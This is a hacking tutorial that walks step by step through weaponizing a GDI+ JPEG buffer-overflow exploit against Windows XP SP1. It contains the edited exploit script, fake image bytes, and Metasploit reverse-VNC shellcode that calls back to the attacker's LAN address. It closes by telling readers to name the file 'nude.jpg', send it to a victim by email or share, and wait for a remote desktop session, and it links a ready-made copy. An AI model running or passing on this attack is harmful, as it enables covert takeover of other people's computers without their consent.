Intro to Buffer Overflows By IMC Tullywacker Shouts IMC GrahamPhisher IMC EXE IMC TwiZted IMC PhirePhreak Insanemasterminds.com GrahamPhisher.com remote-exploit.org Hello, today I am going to be showing you how to perform a buffer overflow on a windows xp sp1 box. I am going to be using Backtrack 3 beta as should you to be able to follow along easily. If you are unfamiliar with buffer overflows I suggest you read up on them before proceeding to the tutorial. http://en.wikipedia.org/wiki/Buffer_overflow Ok lets begin, fire up backtrack. Open up a new terminal. Code: cd /pentest/exploits/milw0rm ok now lets search the sploitlist for GDI exploits Code: cat sploitlist.txt |grep -i GDI ok now copy the 475.sh sploit to the /tmp/ directory Code: cp ./platforms/windows/remote/475.sh /tmp/ now lets edit the file to better suit our needs. Code: nano /tmp/475.sh We need to edit the address of the shellcode for a windows xp sp1 english so comment the 1st line and uncomment the 2nd like so Code: #******************************************** #Address of shellcode #******************************************** #printf "\x42\x42\x42\x42" #control EDX, left these values if u wanna raise an exception and debug in GDI+ printf "\xDC\xB1\xE7\x70" #70E7B1DC WinXP Professional English SP1 -GDIPLUS.DLL version 5.1.3097.0 #printf "\xDC\xB1\x30\x78" #7830B1DC WinXP Professional Italian SP1 -GDIPLUS.DLL version 5.1.3101.0 Next there are formatting problems in the image junk section that need to be corrected Code: #******************************************** #Image junk here...fake JPG #******************************************** printf "\x00\x00\x00\xFF\xDB\x00\x43\x00\x08\x06\x06\x07\x06\x05\x08\x07\x07"; printf "\x07\x09\x09\x08\x0A\x0C\x14\x0D\x0C\x0B\x0B\x0C\x19\x12\x13\x0F\x14"; printf "\x1D\x1A\x1F\x1E\x1D\x1A\x1C\x1C\x20\x24\x2E\x27\x20\x22\x2C\x23\x1C"; printf "\x1C\x28\x37\x29\x2C\x30\x31\x34\x34\x34\x1F\x27\x39\x3D\x38\x32\x3C"; printf "\x2E\x33\x34\x32\xFF\xDB\x00\x43\x01\x09\x09\x09\x0C\x0B\x0C\x18\x0D"; printf "\x0D\x18\x32\x21\x1C\x21\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"; printf "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"; printf "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"; printf "\x32\x32\x32\x32\x32\xFF\xC0\x00\x11\x08\x00\x03\x00\x03\x03\x01\x22"; printf "\x00\x02\x11\x01\x03\x11\x01\xFF\xC4\x00\x1F\x00\x00\x01\x05\x01\x01"; printf "\x01\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x03\x04\x05"; printf "\x06\x07\x08\x09\x0A\x0B\xFF\xC4\x00\xB5\x10\x00\x02\x01\x03\x03\x02"; printf "\x04\x03\x05\x05\x04\x04\x00\x00\x01\x7D\x01\x02\x03\x00\x04\x11\x05"; printf "\x12\x21\x31\x41\x06\x13\x51\x61\x07\x22\x71\x14\x32\x81\x91\xA1\x08"; printf "\x23\x42\xB1\xC1\x15\x52\xD1\xF0\x24\x33\x62\x72\x82\x09\x0A\x16\x17"; printf "\x18\x19\x1A\x25\x26\x27\x28\x29\x2A\x34\x35\x36\x37\x38\x39\x3A\x43"; printf "\x44\x45\x46\x47\x48\x49\x4A\x53\x54\x55\x56\x57\x58\x59\x5A\x63\x64"; printf "\x65\x66\x67\x68\x69\x6A\x73\x74\x75\x76\x77\x78\x79\x7A\x83\x84\x85"; printf "\x86\x87\x88\x89\x8A\x92\x93\x94\x95\x96\x97\x98\x99\x9A\xA2\xA3\xA4"; printf "\xA5\xA6\xA7\xA8\xA9\xAA\xB2\xB3\xB4\xB5\xB6\xB7\xB8\xB9\xBA\xC2\xC3"; printf "\xC4\xC5\xC6\xC7\xC8\xC9\xCA\xD2\xD3\xD4\xD5\xD6\xD7\xD8\xD9\xDA\xE1"; printf "\xE2\xE3\xE4\xE5\xE6\xE7\xE8\xE9\xEA\xF1\xF2\xF3\xF4\xF5\xF6\xF7\xF8"; printf "\xF9\xFA\xFF\xC4\x00\x1F\x01\x00\x03\x01\x01\x01\x01\x01\x01\x01\x01"; printf "\x01\x00\x00\x00\x00\x00\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0A"; printf "\x0B\xFF\xC4\x00\xB5\x11\x00\x02\x01\x02\x04\x04\x03\x04\x07\x05\x04"; printf "\x04\x00\x01\x02\x77\x00\x01\x02\x03\x11\x04\x05\x21\x31\x06\x12\x41"; printf "\x51\x07\x61\x71\x13\x22\x32\x81\x08\x14\x42\x91\xA1\xB1\xC1\x09\x23"; printf "\x33\x52\xF0\x15\x62\x72\xD1\x0A\x16\x24\x34\xE1\x25\xF1\x17\x18\x19"; printf "\x1A\x26\x27\x28\x29\x2A\x35\x36\x37\x38\x39\x3A\x43\x44\x45\x46\x47"; printf "\x48\x49\x4A\x53\x54\x55\x56\x57\x58\x59\x5A\x63\x64\x65\x66\x67\x68"; printf "\x69\x6A\x73\x74\x75\x76\x77\x78\x79\x7A\x82\x83\x84\x85\x86\x87\x88"; printf "\x89\x8A\x92\x93\x94\x95\x96\x97\x98\x99\x9A\xA2\xA3\xA4\xA5\xA6\xA7"; printf "\xA8\xA9\xAA\xB2\xB3\xB4\xB5\xB6\xB7\xB8\xB9\xBA\xC2\xC3\xC4\xC5\xC6"; printf "\xC7\xC8\xC9\xCA\xD2\xD3\xD4\xD5\xD6\xD7\xD8\xD9\xDA\xE2\xE3\xE4\xE5"; printf "\xE6\xE7\xE8\xE9\xEA\xF2\xF3\xF4\xF5\xF6\xF7\xF8\xF9\xFA\xFF\xDA\x00"; printf "\x0C\x03\x01\x00\x02\x11\x03\x11\x00\x3F\x00\xF9\xFE\x8A\x28\xA0\x0F"; Now lets edit the shellcode area we need to replace \xCC with a NOP (\x90) and fix another formatting issue Code: #******************************************** #SHELLCODE AREA #place shellcode here... #don't use any "FFD9" bytes, cause it is the marker for end of jpeg image #******************************************** printf "\x90\x90\x90\x90"; #replace "CC=INT3" byte with NOP to make it works! Ok next fix yet another formatting issue Code: #******************************************** #shellcode: CreateUserX as Administrator (provided by Metasploit, thanx for your Framework, is great!) #******************************************** Now the original purpose for this exploit is to add an administrator to the users group as you can see from the line above. We are going to be using a reverse vnc connection because a nice GUI is always the most fun. You can do it if you want just to see that the sploit works, but here at IMC we strive to do shit differently Smiley Now cd the framework2 directory Code: cd /pentest/exploits/framework2 To view all the payloads type Code: ../msfpayload We're going to use the win32_reverse_vncinject payload Now to see what variables are needed to be set we type Code: ../msfpayload win32_reverse_vncinject As you can see the only field left blank is the LHOST option so we need our lan ip address Code: ifconfig Code: inet addr:192.168.1.113 Now we need to get our custom payload and put it into our sploit Code: ../msfpayload win32_reverse_vncinject LHOST=192.168.1.113 P This will return the payload that is suited for our needs. Here's mine Code: "\xe8\x56\x00\x00\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45\x3c". "\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x32". "\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74\x07". "\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a\x24". "\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8". "\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x5e\x6a\x30\x59\x64". "\x8b\x19\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x5b\x08\x53\x68\x8e". "\x4e\x0e\xec\xff\xd6\x89\xc7\x81\xec\x00\x01\x00\x00\x57\x56\x53". "\x89\xe5\xe8\x1f\x00\x00\x00\x90\x01\x00\x00\xb6\x19\x18\xe7\xa4". "\x19\x70\xe9\xec\xf9\xaa\x60\xd9\x09\xf5\xad\xcb\xed\xfc\x3b\x57". "\x53\x32\x5f\x33\x32\x00\x5b\x8d\x4b\x18\x51\xff\xd7\x89\xdf\x89". "\xc3\x8d\x75\x14\x6a\x05\x59\x51\x53\xff\x34\x8f\xff\x55\x04\x59". "\x89\x04\x8e\xe2\xf2\x2b\x27\x54\xff\x37\xff\x55\x28\x31\xc0\x50". "\x50\x50\x50\x40\x50\x40\x50\xff\x55\x24\x89\xc7\x68\xc0\xa8\x01". "\x71\x68\x02\x00\x10\xe1\x89\xe1\x6a\x10\x51\x57\xff\x55\x20\x59". "\x59\x81\xec\x00\x10\x00\x00\x89\xe3\x6a\x00\x68\x00\x10\x00\x00". "\x53\x57\xff\x55\x18\x81\xec\x00\x04\x00\x00\xff\xd3"; So copy your payload and now lets put it in our sploit Code: nano /tmp/475.sh Code: #******************************************** #shellcode: CreateUserX as Administrator (provided by Metasploit, thanx for your Framework, is great!) #******************************************** printf "\xe8\x56\x00\x00\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45\x3c". printf "\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x32". printf "\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74\x07". printf "\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a\x24". printf "\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8". printf "\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x5e\x6a\x30\x59\x64". printf "\x8b\x19\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x5b\x08\x53\x68\x8e". printf "\x4e\x0e\xec\xff\xd6\x89\xc7\x81\xec\x00\x01\x00\x00\x57\x56\x53". printf "\x89\xe5\xe8\x1f\x00\x00\x00\x90\x01\x00\x00\xb6\x19\x18\xe7\xa4". printf "\x19\x70\xe9\xec\xf9\xaa\x60\xd9\x09\xf5\xad\xcb\xed\xfc\x3b\x57". printf "\x53\x32\x5f\x33\x32\x00\x5b\x8d\x4b\x18\x51\xff\xd7\x89\xdf\x89". printf "\xc3\x8d\x75\x14\x6a\x05\x59\x51\x53\xff\x34\x8f\xff\x55\x04\x59". printf "\x89\x04\x8e\xe2\xf2\x2b\x27\x54\xff\x37\xff\x55\x28\x31\xc0\x50". printf "\x50\x50\x50\x40\x50\x40\x50\xff\x55\x24\x89\xc7\x68\xc0\xa8\x01". printf "\x71\x68\x02\x00\x10\xe1\x89\xe1\x6a\x10\x51\x57\xff\x55\x20\x59". printf "\x59\x81\xec\x00\x10\x00\x00\x89\xe3\x6a\x00\x68\x00\x10\x00\x00". printf "\x53\x57\xff\x55\x18\x81\xec\x00\x04\x00\x00\xff\xd3"; Now we need to set up our payload handler Code: ../msfcli payload_handler PAYLOAD=win32_reverse_vncinject LHOST=192.168.1.102 Now you need to make your sploit into a .jpg file Code: cd /tmp/ Code: chmod +x 475.sh Code: ../475.sh > nude.jpg Now what your going to do is give the victim the file, email, share, whatever up to u. All you have to do now is sit and wait for the victim to open a folder containing the malicious .jpg file, they dont even have to open it! This will spawn a vnc session and give you a gui of the computer. Congrats on making your 1st malicious jpg file. For all you lazy people ive uploaded the modified sploit all you have to do is change the payload Code: http://imctully.hostaim.com/maliciousjpg.txt ~Tully